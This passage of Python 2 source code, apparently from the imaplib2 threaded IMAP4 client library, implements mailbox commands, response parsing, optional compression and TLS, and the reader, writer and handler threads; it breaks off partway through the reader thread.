commands take two optional named arguments: 'callback' and 'cb_arg' If 'callback' is provided then the command is asynchronous, so after the command is queued for transmission, the call returns immediately with the tuple (None, None). The result will be posted by invoking "callback" with one arg, a tuple: callback((result, cb_arg, None)) or, if there was a problem: callback((None, cb_arg, (exception class, reason))) Otherwise the command is synchronous (waits for result). But note that state-changing commands will both block until previous commands have completed, and block subsequent commands until they have finished. All (non-callback) arguments to commands are converted to strings, except for AUTHENTICATE, and the last argument to APPEND which is passed as an IMAP4 literal. If necessary (the string contains any non-printing characters or white-space and isn't enclosed with either parentheses or double quotes) each string is quoted. However, the 'password' argument to the LOGIN command is always quoted. If you want to avoid having an argument string quoted (eg: the 'flags' argument to STORE) then enclose the string in parentheses (eg: "(\Deleted)"). There is one instance variable, 'state', that is useful for tracking whether the client needs to login to the server. If it has the value "AUTH" after instantiating the class, then the connection is pre-authenticated (otherwise it will be "NONAUTH"). Selecting a mailbox changes the state to be "SELECTED", closing a mailbox changes back to "AUTH", and once the client has logged out, the state changes to "LOGOUT" and no further commands may be issued. Note: to use this module, you must read the RFCs pertaining to the IMAP4 protocol, as the semantics of the arguments to each IMAP4 command are left to the invoker, not to mention the results. Also, most IMAP servers implement a sub-set of the commands available here. Note also that you must call logout() to shut down threads before discarding an instance. """ class error(Exception): pass # Logical errors - debug required class abort(error): pass # Service errors - close and retry class readonly(abort): pass # Mailbox status changed to READ-ONLY continuation_cre = re.compile(r'\+( (?P<data>.*))?') literal_cre = re.compile(r'.*{(?P<size>\d+)}$') mapCRLF_cre = re.compile(r'\r\n|\r|\n') # Need to quote "atom-specials" :- # "(" / ")" / "{" / SP / 0x00 - 0x1f / 0x7f / "%" / "*" / DQUOTE / "\" / "]" # so match not the inverse set mustquote_cre = re.compile(r"[^!#$&'+,./0-9:;<=>?@A-Z\[^_`a-z|}~-]") response_code_cre = re.compile(r'\[(?P<type>[A-Z-]+)( (?P<data>[^\]]*))?\]') untagged_response_cre = re.compile(r'\* (?P<type>[A-Z-]+)( (?P<data>.*))?') untagged_status_cre = re.compile(r'\* (?P<data>\d+) (?P<type>[A-Z-]+)( (?P<data2>.*))?') def __init__(self, host=None, port=None, debug=None, debug_file=None, identifier=None): self.state = NONAUTH # IMAP4 protocol state self.literal = None # A literal argument to a command self.tagged_commands = {} # Tagged commands awaiting response self.untagged_responses = [] # [[typ: [data, ...]], ...] self.mailbox = None # Current mailbox selected self.mailboxes = {} # Untagged responses state per mailbox self.is_readonly = False # READ-ONLY desired state self.idle_rqb = None # Server IDLE Request - see _IdleCont self.idle_timeout = None # Must prod server occasionally self._expecting_data = 0 # Expecting message data self._accumulated_data = [] # Message data accumulated so far self._literal_expected = None # Message data descriptor self.compressor = None # COMPRESS/DEFLATE if not None self.decompressor = None # Create unique tag for this session, # and compile tagged response matcher. self.tagnum = 0 self.tagpre = Int2AP(random.randint(4096, 65535)) self.tagre = re.compile(r'(?P<tag>' + self.tagpre + r'\d+) (?P<type>[A-Z]+) (?P<data>.*)') if __debug__: self._init_debug(debug, debug_file) # Open socket to server. self.open(host, port) if __debug__: if debug: self._mesg('connected to %s on port %s' % (self.host, self.port)) # Threading if identifier is not None: self.identifier = identifier else: self.identifier = self.host if self.identifier: self.identifier += ' ' self.Terminate = False self.state_change_free = threading.Event() self.state_change_pending = threading.Lock() self.commands_lock = threading.Lock() self.ouq = Queue.Queue(10) self.inq = Queue.Queue() self.wrth = threading.Thread(target=self._writer) self.wrth.start() self.rdth = threading.Thread(target=self._reader) self.rdth.start() self.inth = threading.Thread(target=self._handler) self.inth.start() # Get server welcome message, # request and store CAPABILITY response. try: self.welcome = self._request_push(tag='continuation').get_response('IMAP4 protocol error: %s')[1] if self._get_untagged_response('PREAUTH'): self.state = AUTH if __debug__: self._log(1, 'state => AUTH') elif self._get_untagged_response('OK'): if __debug__: self._log(1, 'state => NONAUTH') else: raise self.error(self.welcome) typ, dat = self.capability() if dat == [None]: raise self.error('no CAPABILITY response from server') self.capabilities = tuple(dat[-1].upper().split()) if __debug__: self._log(3, 'CAPABILITY: %r' % (self.capabilities,)) for version in AllowedVersions: if not version in self.capabilities: continue self.PROTOCOL_VERSION = version break else: raise self.error('server not IMAP4 compliant') except: self._close_threads() raise def __getattr__(self, attr): # Allow UPPERCASE variants of IMAP4 command methods. if attr in Commands: return getattr(self, attr.lower()) raise AttributeError("Unknown IMAP4 command: '%s'" % attr) # Overridable methods def open(self, host=None, port=None): """open(host=None, port=None) Setup connection to remote server on "host:port" (default: localhost:standard IMAP4 port). This connection will be used by the routines: read, send, shutdown, socket.""" self.host = host is not None and host or '' self.port = port is not None and port or IMAP4_PORT self.sock = self.open_socket() self.read_fd = self.sock.fileno() def open_socket(self): """open_socket() Open socket choosing first address family available.""" msg = (-1, 'could not open socket') for res in socket.getaddrinfo(self.host, self.port, socket.AF_UNSPEC, socket.SOCK_STREAM): af, socktype, proto, canonname, sa = res try: s = socket.socket(af, socktype, proto) except socket.error, msg: continue try: s.connect(sa) except socket.error, msg: s.close() continue break else: raise socket.error(msg) return s def start_compressing(self): """start_compressing() Enable deflate compression on the socket (RFC 4978).""" # rfc 1951 - pure DEFLATE, so use -15 for both windows self.decompressor = zlib.decompressobj(-15) self.compressor = zlib.compressobj(zlib.Z_DEFAULT_COMPRESSION, zlib.DEFLATED, -15) def read(self, size): """data = read(size) Read at most 'size' bytes from remote.""" if self.decompressor is None: return self.sock.recv(size) if self.decompressor.unconsumed_tail: data = self.decompressor.unconsumed_tail else: data = self.sock.recv(8192) return self.decompressor.decompress(data, size) def send(self, data): """send(data) Send 'data' to remote.""" if self.compressor is not None: data = self.compressor.compress(data) data += self.compressor.flush(zlib.Z_SYNC_FLUSH) self.sock.sendall(data) def shutdown(self): """shutdown() Close I/O established in "open".""" self.sock.close() def socket(self): """socket = socket() Return socket instance used to connect to IMAP4 server.""" return self.sock # Utility methods def enable_compression(self): """enable_compression() Ask the server to start compressing the connection. Should be called from user of this class after instantiation, as in: if 'COMPRESS=DEFLATE' in imapobj.capabilities: imapobj.enable_compression()""" try: typ, dat = self._simple_command('COMPRESS', 'DEFLATE') if typ == 'OK': self.start_compressing() if __debug__: self._log(1, 'Enabled COMPRESS=DEFLATE') finally: self.state_change_pending.release() def pop_untagged_responses(self): """ for typ,data in pop_untagged_responses(): pass Generator for any remaining untagged responses. Returns and removes untagged responses in order of reception. Use at your own risk!""" while self.untagged_responses: self.commands_lock.acquire() try: yield self.untagged_responses.pop(0) finally: self.commands_lock.release() def recent(self, **kw): """(typ, [data]) = recent() Return 'RECENT' responses if any exist, else prompt server for an update using the 'NOOP' command. 'data' is None if no new messages, else list of RECENT responses, most recent last.""" name = 'RECENT' data = [] while True: dat = self._get_untagged_response(name) if not dat: break data += dat if data: return self._deliver_dat(name, data, kw) kw['untagged_response'] = name return self.noop(**kw) # Prod server for response def response(self, code, **kw): """(code, [data]) = response(code) Return data for response 'code' if received, or None. Old value for response 'code' is cleared.""" typ, dat = self._untagged_response(code, [None], code.upper()) return self._deliver_dat(typ, dat, kw) # IMAP4 commands def append(self, mailbox, flags, date_time, message, **kw): """(typ, [data]) = append(mailbox, flags, date_time, message) Append message to named mailbox. All args except `message' can be None.""" name = 'APPEND' if not mailbox: mailbox = 'INBOX' if flags: if (flags[0],flags[-1]) != ('(',')'): flags = '(%s)' % flags else: flags = None if date_time: date_time = Time2Internaldate(date_time) else: date_time = None self.literal = self.mapCRLF_cre.sub(CRLF, message) try: return self._simple_command(name, mailbox, flags, date_time, **kw) finally: self.state_change_pending.release() def authenticate(self, mechanism, authobject, **kw): """(typ, [data]) = authenticate(mechanism, authobject) Authenticate command - requires response processing. 'mechanism' specifies which authentication mechanism is to be used - it must appear in <instance>.capabilities in the form AUTH=<mechanism>. 'authobject' must be a callable object: data = authobject(response) It will be called to process server continuation responses. It should return data that will be encoded and sent to server. It should return None if the client abort response '*' should be sent instead.""" self.literal = _Authenticator(authobject).process try: typ, dat = self._simple_command('AUTHENTICATE', mechanism.upper()) if typ != 'OK': self._deliver_exc(self.error, dat[-1], kw) self.state = AUTH if __debug__: self._log(1, 'state => AUTH') finally: self.state_change_pending.release() return self._deliver_dat(typ, dat, kw) def capability(self, **kw): """(typ, [data]) = capability() Fetch capabilities list from server.""" name = 'CAPABILITY' kw['untagged_response'] = name return self._simple_command(name, **kw) def check(self, **kw): """(typ, [data]) = check() Checkpoint mailbox on server.""" return self._simple_command('CHECK', **kw) def close(self, **kw): """(typ, [data]) = close() Close currently selected mailbox. Deleted messages are removed from writable mailbox. This is the recommended command before 'LOGOUT'.""" if self.state != 'SELECTED': raise self.error('No mailbox selected.') try: typ, dat = self._simple_command('CLOSE') finally: self.state = AUTH if __debug__: self._log(1, 'state => AUTH') self.state_change_pending.release() return self._deliver_dat(typ, dat, kw) def copy(self, message_set, new_mailbox, **kw): """(typ, [data]) = copy(message_set, new_mailbox) Copy 'message_set' messages onto end of 'new_mailbox'.""" return self._simple_command('COPY', message_set, new_mailbox, **kw) def create(self, mailbox, **kw): """(typ, [data]) = create(mailbox) Create new mailbox.""" return self._simple_command('CREATE', mailbox, **kw) def delete(self, mailbox, **kw): """(typ, [data]) = delete(mailbox) Delete old mailbox.""" return self._simple_command('DELETE', mailbox, **kw) def deleteacl(self, mailbox, who, **kw): """(typ, [data]) = deleteacl(mailbox, who) Delete the ACLs (remove any rights) set for who on mailbox.""" return self._simple_command('DELETEACL', mailbox, who, **kw) def examine(self, mailbox='INBOX', **kw): """(typ, [data]) = examine(mailbox='INBOX', readonly=False) Select a mailbox for READ-ONLY access. (Flushes all untagged responses.) 'data' is count of messages in mailbox ('EXISTS' response). Mandated responses are ('FLAGS', 'EXISTS', 'RECENT', 'UIDVALIDITY'), so other responses should be obtained via "response('FLAGS')" etc.""" return self.select(mailbox=mailbox, readonly=True, **kw) def expunge(self, **kw): """(typ, [data]) = expunge() Permanently remove deleted items from selected mailbox. Generates 'EXPUNGE' response for each deleted message. 'data' is list of 'EXPUNGE'd message numbers in order received.""" name = 'EXPUNGE' kw['untagged_response'] = name return self._simple_command(name, **kw) def fetch(self, message_set, message_parts, **kw): """(typ, [data, ...]) = fetch(message_set, message_parts) Fetch (parts of) messages. 'message_parts' should be a string of selected parts enclosed in parentheses, eg: "(UID BODY[TEXT])". 'data' are tuples of message part envelope and data, followed by a string containing the trailer.""" name = 'FETCH' kw['untagged_response'] = name return self._simple_command(name, message_set, message_parts, **kw) def getacl(self, mailbox, **kw): """(typ, [data]) = getacl(mailbox) Get the ACLs for a mailbox.""" kw['untagged_response'] = 'ACL' return self._simple_command('GETACL', mailbox, **kw) def getannotation(self, mailbox, entry, attribute, **kw): """(typ, [data]) = getannotation(mailbox, entry, attribute) Retrieve ANNOTATIONs.""" kw['untagged_response'] = 'ANNOTATION' return self._simple_command('GETANNOTATION', mailbox, entry, attribute, **kw) def getquota(self, root, **kw): """(typ, [data]) = getquota(root) Get the quota root's resource usage and limits. (Part of the IMAP4 QUOTA extension defined in rfc2087.)""" kw['untagged_response'] = 'QUOTA' return self._simple_command('GETQUOTA', root, **kw) def getquotaroot(self, mailbox, **kw): # Hmmm, this is non-std! Left for backwards-compatibility, sigh. # NB: usage should have been defined as: # (typ, [QUOTAROOT responses...]) = getquotaroot(mailbox) # (typ, [QUOTA responses...]) = response('QUOTA') """(typ, [[QUOTAROOT responses...], [QUOTA responses...]]) = getquotaroot(mailbox) Get the list of quota roots for the named mailbox.""" typ, dat = self._simple_command('GETQUOTAROOT', mailbox) typ, quota = self._untagged_response(typ, dat, 'QUOTA') typ, quotaroot = self._untagged_response(typ, dat, 'QUOTAROOT') return self._deliver_dat(typ, [quotaroot, quota], kw) def id(self, *kv_pairs, **kw): """(typ, [data]) = <instance>.id(kv_pairs) 'data' is list of ID key value pairs. Request information for problem analysis and determination. The ID extension is defined in RFC 2971. """ name = 'ID' kw['untagged_response'] = name return self._simple_command(name, *kv_pairs, **kw) def idle(self, timeout=None, **kw): """"(typ, [data]) = idle(timeout=None) Put server into IDLE mode until server notifies some change, or 'timeout' (secs) occurs (default: 29 minutes), or another IMAP4 command is scheduled.""" name = 'IDLE' self.literal = _IdleCont(self, timeout).process try: return self._simple_command(name, **kw) finally: self.state_change_pending.release() def list(self, directory='""', pattern='*', **kw): """(typ, [data]) = list(directory='""', pattern='*') List mailbox names in directory matching pattern. 'data' is list of LIST responses. NB: for 'pattern': % matches all except separator ( so LIST "" "%" returns names at root) * matches all (so LIST "" "*" returns whole directory tree from root)""" name = 'LIST' kw['untagged_response'] = name return self._simple_command(name, directory, pattern, **kw) def login(self, user, password, **kw): """(typ, [data]) = login(user, password) Identify client using plaintext password. NB: 'password' will be quoted.""" try: typ, dat = self._simple_command('LOGIN', user, self._quote(password)) if typ != 'OK': self._deliver_exc(self.error, dat[-1], kw) self.state = AUTH if __debug__: self._log(1, 'state => AUTH') finally: self.state_change_pending.release() return self._deliver_dat(typ, dat, kw) def login_cram_md5(self, user, password, **kw): """(typ, [data]) = login_cram_md5(user, password) Force use of CRAM-MD5 authentication.""" self.user, self.password = user, password return self.authenticate('CRAM-MD5', self._CRAM_MD5_AUTH, **kw) def _CRAM_MD5_AUTH(self, challenge): """Authobject to use with CRAM-MD5 authentication.""" import hmac return self.user + " " + hmac.HMAC(self.password, challenge).hexdigest() def logout(self, **kw): """(typ, [data]) = logout() Shutdown connection to server. Returns server 'BYE' response. NB: You must call this to shut down threads before discarding an instance.""" self.state = LOGOUT if __debug__: self._log(1, 'state => LOGOUT') try: typ, dat = self._simple_command('LOGOUT') except: typ, dat = 'NO', ['%s: %s' % sys.exc_info()[:2]] if __debug__: self._log(1, dat) self._close_threads() self.state_change_pending.release() if __debug__: self._log(1, 'connection closed') bye = self._get_untagged_response('BYE', leave=True) if bye: typ, dat = 'BYE', bye return self._deliver_dat(typ, dat, kw) def lsub(self, directory='""', pattern='*', **kw): """(typ, [data, ...]) = lsub(directory='""', pattern='*') List 'subscribed' mailbox names in directory matching pattern. 'data' are tuples of message part envelope and data.""" name = 'LSUB' kw['untagged_response'] = name return self._simple_command(name, directory, pattern, **kw) def myrights(self, mailbox, **kw): """(typ, [data]) = myrights(mailbox) Show my ACLs for a mailbox (i.e. the rights that I have on mailbox).""" name = 'MYRIGHTS' kw['untagged_response'] = name return self._simple_command(name, mailbox, **kw) def namespace(self, **kw): """(typ, [data, ...]) = namespace() Returns IMAP namespaces ala rfc2342.""" name = 'NAMESPACE' kw['untagged_response'] = name return self._simple_command(name, **kw) def noop(self, **kw): """(typ, [data]) = noop() Send NOOP command.""" if __debug__: self._dump_ur(3) return self._simple_command('NOOP', **kw) def partial(self, message_num, message_part, start, length, **kw): """(typ, [data, ...]) = partial(message_num, message_part, start, length) Fetch truncated part of a message. 'data' is tuple of message part envelope and data. NB: obsolete.""" name = 'PARTIAL' kw['untagged_response'] = 'FETCH' return self._simple_command(name, message_num, message_part, start, length, **kw) def proxyauth(self, user, **kw): """(typ, [data]) = proxyauth(user) Assume authentication as 'user'. (Allows an authorised administrator to proxy into any user's mailbox.)""" try: return self._simple_command('PROXYAUTH', user, **kw) finally: self.state_change_pending.release() def rename(self, oldmailbox, newmailbox, **kw): """(typ, [data]) = rename(oldmailbox, newmailbox) Rename old mailbox name to new.""" return self._simple_command('RENAME', oldmailbox, newmailbox, **kw) def search(self, charset, *criteria, **kw): """(typ, [data]) = search(charset, criterion, ...) Search mailbox for matching messages. 'data' is space separated list of matching message numbers.""" name = 'SEARCH' kw['untagged_response'] = name if charset: return self._simple_command(name, 'CHARSET', charset, *criteria, **kw) return self._simple_command(name, *criteria, **kw) def select(self, mailbox='INBOX', readonly=False, **kw): """(typ, [data]) = select(mailbox='INBOX', readonly=False) Select a mailbox. (Restores any previous untagged responses.) 'data' is count of messages in mailbox ('EXISTS' response). Mandated responses are ('FLAGS', 'EXISTS', 'RECENT', 'UIDVALIDITY'), so other responses should be obtained via "response('FLAGS')" etc.""" self.commands_lock.acquire() # Save state of old mailbox, restore state for new... self.mailboxes[self.mailbox] = self.untagged_responses self.untagged_responses = self.mailboxes.setdefault(mailbox, []) self.commands_lock.release() self.mailbox = mailbox self.is_readonly = readonly and True or False if readonly: name = 'EXAMINE' else: name = 'SELECT' try: rqb = self._command(name, mailbox) typ, dat = rqb.get_response('command: %s => %%s' % rqb.name) if typ != 'OK': if self.state == SELECTED: self.state = AUTH if __debug__: self._log(1, 'state => AUTH') if typ == 'BAD': self._deliver_exc(self.error, '%s command error: %s %s. Data: %.100s' % (name, typ, dat, mailbox), kw) return self._deliver_dat(typ, dat, kw) self.state = SELECTED if __debug__: self._log(1, 'state => SELECTED') finally: self.state_change_pending.release() if self._get_untagged_response('READ-ONLY', leave=True) and not readonly: if __debug__: self._dump_ur(1) self._deliver_exc(self.readonly, '%s is not writable' % mailbox, kw) typ, dat = self._untagged_response(typ, [None], 'EXISTS') return self._deliver_dat(typ, dat, kw) def setacl(self, mailbox, who, what, **kw): """(typ, [data]) = setacl(mailbox, who, what) Set a mailbox acl.""" try: return self._simple_command('SETACL', mailbox, who, what, **kw) finally: self.state_change_pending.release() def setannotation(self, *args, **kw): """(typ, [data]) = setannotation(mailbox[, entry, attribute]+) Set ANNOTATIONs.""" kw['untagged_response'] = 'ANNOTATION' return self._simple_command('SETANNOTATION', *args, **kw) def setquota(self, root, limits, **kw): """(typ, [data]) = setquota(root, limits) Set the quota root's resource limits.""" kw['untagged_response'] = 'QUOTA' try: return self._simple_command('SETQUOTA', root, limits, **kw) finally: self.state_change_pending.release() def sort(self, sort_criteria, charset, *search_criteria, **kw): """(typ, [data]) = sort(sort_criteria, charset, search_criteria, ...) IMAP4rev1 extension SORT command.""" name = 'SORT' if (sort_criteria[0],sort_criteria[-1]) != ('(',')'): sort_criteria = '(%s)' % sort_criteria kw['untagged_response'] = name return self._simple_command(name, sort_criteria, charset, *search_criteria, **kw) def starttls(self, keyfile=None, certfile=None, **kw): """(typ, [data]) = starttls(keyfile=None, certfile=None) Start TLS negotiation as per RFC 2595.""" name = 'STARTTLS' if name not in self.capabilities: raise self.abort('TLS not supported by server') if hasattr(self, '_tls_established') and self._tls_established: raise self.abort('TLS session already established') try: typ, dat = self._simple_command(name) finally: self.state_change_pending.release() if typ == 'OK': import ssl self.sock = ssl.wrap_socket(self.sock, keyfile, certfile) self.read_fd = self.sock.fileno() typ, dat = self.capability() if dat == [None]: raise self.error('no CAPABILITY response from server') self.capabilities = tuple(dat[-1].upper().split()) self._tls_established = True else: raise self.error("Couldn't establish TLS session: %s" % dat) typ, dat = self._untagged_response(typ, dat, name) return self._deliver_dat(typ, dat, kw) def status(self, mailbox, names, **kw): """(typ, [data]) = status(mailbox, names) Request named status conditions for mailbox.""" name = 'STATUS' kw['untagged_response'] = name return self._simple_command(name, mailbox, names, **kw) def store(self, message_set, command, flags, **kw): """(typ, [data]) = store(message_set, command, flags) Alters flag dispositions for messages in mailbox.""" if (flags[0],flags[-1]) != ('(',')'): flags = '(%s)' % flags # Avoid quoting the flags kw['untagged_response'] = 'FETCH' return self._simple_command('STORE', message_set, command, flags, **kw) def subscribe(self, mailbox, **kw): """(typ, [data]) = subscribe(mailbox) Subscribe to new mailbox.""" try: return self._simple_command('SUBSCRIBE', mailbox, **kw) finally: self.state_change_pending.release() def thread(self, threading_algorithm, charset, *search_criteria, **kw): """(type, [data]) = thread(threading_alogrithm, charset, search_criteria, ...) IMAPrev1 extension THREAD command.""" name = 'THREAD' kw['untagged_response'] = name return self._simple_command(name, threading_algorithm, charset, *search_criteria, **kw) def uid(self, command, *args, **kw): """(typ, [data]) = uid(command, arg, ...) Execute "command arg ..." with messages identified by UID, rather than message number. Assumes 'command' is legal in current state. Returns response appropriate to 'command'.""" command = command.upper() if command in UID_direct: resp = command else: resp = 'FETCH' kw['untagged_response'] = resp return self._simple_command('UID', command, *args, **kw) def unsubscribe(self, mailbox, **kw): """(typ, [data]) = unsubscribe(mailbox) Unsubscribe from old mailbox.""" try: return self._simple_command('UNSUBSCRIBE', mailbox, **kw) finally: self.state_change_pending.release() def xatom(self, name, *args, **kw): """(typ, [data]) = xatom(name, arg, ...) Allow simple extension commands notified by server in CAPABILITY response. Assumes extension command 'name' is legal in current state. Returns response appropriate to extension command 'name'.""" name = name.upper() if not name in Commands: Commands[name] = ((self.state,), False) try: return self._simple_command(name, *args, **kw) finally: if self.state_change_pending.locked(): self.state_change_pending.release() # Internal methods def _append_untagged(self, typ, dat): # Append new 'dat' to end of last untagged response if same 'typ', # else append new response. if dat is None: dat = '' self.commands_lock.acquire() if self.untagged_responses: urn, urd = self.untagged_responses[-1] if urn != typ: urd = None else: urd = None if urd is None: urd = [] self.untagged_responses.append([typ, urd]) urd.append(dat) self.commands_lock.release() if __debug__: self._log(5, 'untagged_responses[%s] %s += ["%s"]' % (typ, len(urd)-1, dat)) def _check_bye(self): bye = self._get_untagged_response('BYE', leave=True) if bye: raise self.abort(bye[-1]) def _checkquote(self, arg): # Must quote command args if "atom-specials" present, # and not already quoted. if not isinstance(arg, basestring): return arg if len(arg) >= 2 and (arg[0],arg[-1]) in (('(',')'),('"','"')): return arg if arg and self.mustquote_cre.search(arg) is None: return arg return self._quote(arg) def _command(self, name, *args, **kw): if Commands[name][CMD_VAL_ASYNC]: cmdtyp = 'async' else: cmdtyp = 'sync' if __debug__: self._log(1, '[%s] %s %s' % (cmdtyp, name, args)) self.state_change_pending.acquire() self._end_idle() if cmdtyp == 'async': self.state_change_pending.release() else: # Need to wait for all async commands to complete self._check_bye() self.commands_lock.acquire() if self.tagged_commands: self.state_change_free.clear() need_event = True else: need_event = False self.commands_lock.release() if need_event: if __debug__: self._log(4, 'sync command %s waiting for empty commands Q' % name) self.state_change_free.wait() if __debug__: self._log(4, 'sync command %s proceeding' % name) if self.state not in Commands[name][CMD_VAL_STATES]: self.literal = None raise self.error('command %s illegal in state %s' % (name, self.state)) self._check_bye() for typ in ('OK', 'NO', 'BAD'): self._get_untagged_response(typ) if self._get_untagged_response('READ-ONLY', leave=True) and not self.is_readonly: self.literal = None raise self.readonly('mailbox status changed to READ-ONLY') if self.Terminate: raise self.abort('connection closed') rqb = self._request_push(name=name, **kw) data = '%s %s' % (rqb.tag, name) for arg in args: if arg is None: continue data = '%s %s' % (data, self._checkquote(arg)) literal = self.literal if literal is not None: self.literal = None if isinstance(literal, basestring): literator = None data = '%s {%s}' % (data, len(literal)) else: literator = literal if __debug__: self._log(4, 'data=%s' % data) rqb.data = '%s%s' % (data, CRLF) if literal is None: self.ouq.put(rqb) return rqb # Must setup continuation expectancy *before* ouq.put crqb = self._request_push(tag='continuation') self.ouq.put(rqb) while True: # Wait for continuation response ok, data = crqb.get_response('command: %s => %%s' % name) if __debug__: self._log(3, 'continuation => %s, %s' % (ok, data)) # NO/BAD response? if not ok: break # Send literal if literator is not None: literal = literator(data, rqb) if literal is None: break if literator is not None: # Need new request for next continuation response crqb = self._request_push(tag='continuation') if __debug__: self._log(4, 'write literal size %s' % len(literal)) crqb.data = '%s%s' % (literal, CRLF) self.ouq.put(crqb) if literator is None: break return rqb def _command_complete(self, rqb, kw): # Called for non-callback commands typ, dat = rqb.get_response('command: %s => %%s' % rqb.name) self._check_bye() if typ == 'BAD': if __debug__: self._print_log() raise self.error('%s command error: %s %s. Data: %.100s' % (rqb.name, typ, dat, rqb.data)) if 'untagged_response' in kw: return self._untagged_response(typ, dat, kw['untagged_response']) return typ, dat def _command_completer(self, (response, cb_arg, error)): # Called for callback commands rqb, kw = cb_arg rqb.callback = kw['callback'] rqb.callback_arg = kw.get('cb_arg') if error is not None: if __debug__: self._print_log() typ, val = error rqb.abort(typ, val) return bye = self._get_untagged_response('BYE', leave=True) if bye: rqb.abort(self.abort, bye[-1]) return typ, dat = response if typ == 'BAD': if __debug__: self._print_log() rqb.abort(self.error, '%s command error: %s %s. Data: %.100s' % (rqb.name, typ, dat, rqb.data)) return if 'untagged_response' in kw: response = self._untagged_response(typ, dat, kw['untagged_response']) rqb.deliver(response) def _deliver_dat(self, typ, dat, kw): if 'callback' in kw: kw['callback'](((typ, dat), kw.get('cb_arg'), None)) return typ, dat def _deliver_exc(self, exc, dat, kw): if 'callback' in kw: kw['callback']((None, kw.get('cb_arg'), (exc, dat))) raise exc(dat) def _end_idle(self): irqb = self.idle_rqb if irqb is None: return self.idle_rqb = None self.idle_timeout = None irqb.data = 'DONE%s' % CRLF self.ouq.put(irqb) if __debug__: self._log(2, 'server IDLE finished') def _get_untagged_response(self, name, leave=False): self.commands_lock.acquire() for i, (typ, dat) in enumerate(self.untagged_responses): if typ == name: if not leave: del self.untagged_responses[i] self.commands_lock.release() if __debug__: self._log(5, '_get_untagged_response(%s) => %s' % (name, dat)) return dat self.commands_lock.release() return None def _match(self, cre, s): # Run compiled regular expression 'cre' match method on 's'. # Save result, return success. self.mo = cre.match(s) return self.mo is not None def _put_response(self, resp): if self._expecting_data > 0: rlen = len(resp) dlen = min(self._expecting_data, rlen) self._expecting_data -= dlen if rlen <= dlen: self._accumulated_data.append(resp) return self._accumulated_data.append(resp[:dlen]) resp = resp[dlen:] if self._accumulated_data: typ, dat = self._literal_expected self._append_untagged(typ, (dat, ''.join(self._accumulated_data))) self._accumulated_data = [] # Protocol mandates all lines terminated by CRLF resp = resp[:-2] if 'continuation' in self.tagged_commands: continuation_expected = True else: continuation_expected = False if self._literal_expected is not None: dat = resp if self._match(self.literal_cre, dat): self._literal_expected[1] = dat self._expecting_data = int(self.mo.group('size')) if __debug__: self._log(4, 'expecting literal size %s' % self._expecting_data) return typ = self._literal_expected[0] self._literal_expected = None self._append_untagged(typ, dat) # Tail if __debug__: self._log(4, 'literal completed') else: # Command completion response? if self._match(self.tagre, resp): tag = self.mo.group('tag') typ = self.mo.group('type') dat = self.mo.group('data') if not tag in self.tagged_commands: if __debug__: self._log(1, 'unexpected tagged response: %s' % resp) else: self._request_pop(tag, (typ, [dat])) else: dat2 = None # '*' (untagged) responses? if not self._match(self.untagged_response_cre, resp): if self._match(self.untagged_status_cre, resp): dat2 = self.mo.group('data2') if self.mo is None: # Only other possibility is '+' (continuation) response... if self._match(self.continuation_cre, resp): if not continuation_expected: if __debug__: self._log(1, "unexpected continuation response: '%s'" % resp) return self._request_pop('continuation', (True, self.mo.group('data'))) return if __debug__: self._log(1, "unexpected response: '%s'" % resp) return typ = self.mo.group('type') dat = self.mo.group('data') if dat is None: dat = '' # Null untagged response if dat2: dat = dat + ' ' + dat2 # Is there a literal to come? if self._match(self.literal_cre, dat): self._expecting_data = int(self.mo.group('size')) if __debug__: self._log(4, 'read literal size %s' % self._expecting_data) self._literal_expected = [typ, dat] return self._append_untagged(typ, dat) if typ != 'OK': self._end_idle() # Bracketed response information? if typ in ('OK', 'NO', 'BAD') and self._match(self.response_code_cre, dat): self._append_untagged(self.mo.group('type'), self.mo.group('data')) # Command waiting for aborted continuation response? if continuation_expected: self._request_pop('continuation', (False, resp)) # Bad news? if typ in ('NO', 'BAD', 'BYE'): if typ == 'BYE': self.Terminate = True if __debug__: self._log(1, '%s response: %s' % (typ, dat)) def _quote(self, arg): return '"%s"' % arg.replace('\\', '\\\\').replace('"', '\\"') def _request_pop(self, name, data): if __debug__: self._log(4, '_request_pop(%s, %s)' % (name, data)) self.commands_lock.acquire() rqb = self.tagged_commands.pop(name) if not self.tagged_commands: self.state_change_free.set() self.commands_lock.release() rqb.deliver(data) def _request_push(self, tag=None, name=None, **kw): self.commands_lock.acquire() rqb = Request(self, name=name, **kw) if tag is None: tag = rqb.tag self.tagged_commands[tag] = rqb self.commands_lock.release() if __debug__: self._log(4, '_request_push(%s, %s, %s)' % (tag, name, `kw`)) return rqb def _simple_command(self, name, *args, **kw): if 'callback' in kw: rqb = self._command(name, callback=self._command_completer, *args) rqb.callback_arg = (rqb, kw) return (None, None) return self._command_complete(self._command(name, *args), kw) def _untagged_response(self, typ, dat, name): if typ == 'NO': return typ, dat data = self._get_untagged_response(name) if not data: return typ, [None] return typ, data # Threads def _close_threads(self): if __debug__: self._log(1, '_close_threads') self.ouq.put(None) self.wrth.join() if __debug__: self._log(1, 'call shutdown') self.shutdown() self.rdth.join() self.inth.join() def _handler(self): threading.currentThread().setName(self.identifier + 'handler') time.sleep(0.1) # Don't start handling before main thread ready if __debug__: self._log(1, 'starting') typ, val = self.abort, 'connection terminated' while not self.Terminate: try: if self.idle_timeout is not None: timeout = self.idle_timeout - time.time() if timeout <= 0: timeout = 1 if __debug__: if self.idle_rqb is not None: self._log(5, 'server IDLING, timeout=%.2f' % timeout) else: timeout = None line = self.inq.get(True, timeout) except Queue.Empty: if self.idle_rqb is None: continue if self.idle_timeout > time.time(): continue if __debug__: self._log(2, 'server IDLE timedout') line = IDLE_TIMEOUT_RESPONSE if line is None: if __debug__: self._log(1, 'inq None - terminating') break if not isinstance(line, basestring): typ, val = line break try: self._put_response(line) except: typ, val = self.error, 'program error: %s - %s' % sys.exc_info()[:2] break self.Terminate = True if __debug__: self._log(1, 'terminating: %s' % `val`) while not self.ouq.empty(): try: self.ouq.get_nowait().abort(typ, val) except Queue.Empty: break self.ouq.put(None) self.commands_lock.acquire() for name in self.tagged_commands.keys(): rqb = self.tagged_commands.pop(name) rqb.abort(typ, val) self.state_change_free.set() self.commands_lock.release() if __debug__: self._log(1, 'finished') if hasattr(select_module, "poll"): def _reader(self): threading.currentThread().setName(self.identifier + 'reader') if __debug__: self._log(1, 'starting using poll') def poll_error(state): PollErrors = { select.POLLERR: 'Error', select.POLLHUP: 'Hang up', select.POLLNVAL: 'Invalid request: descriptor not open', } return ' '.join([PollErrors[s] for s in PollErrors.keys() if (s & state)]) line_part = '' poll = select.poll() poll.register(self.read_fd, select.POLLIN) rxzero = 0 while not self.Terminate: if self.state == LOGOUT: timeout = 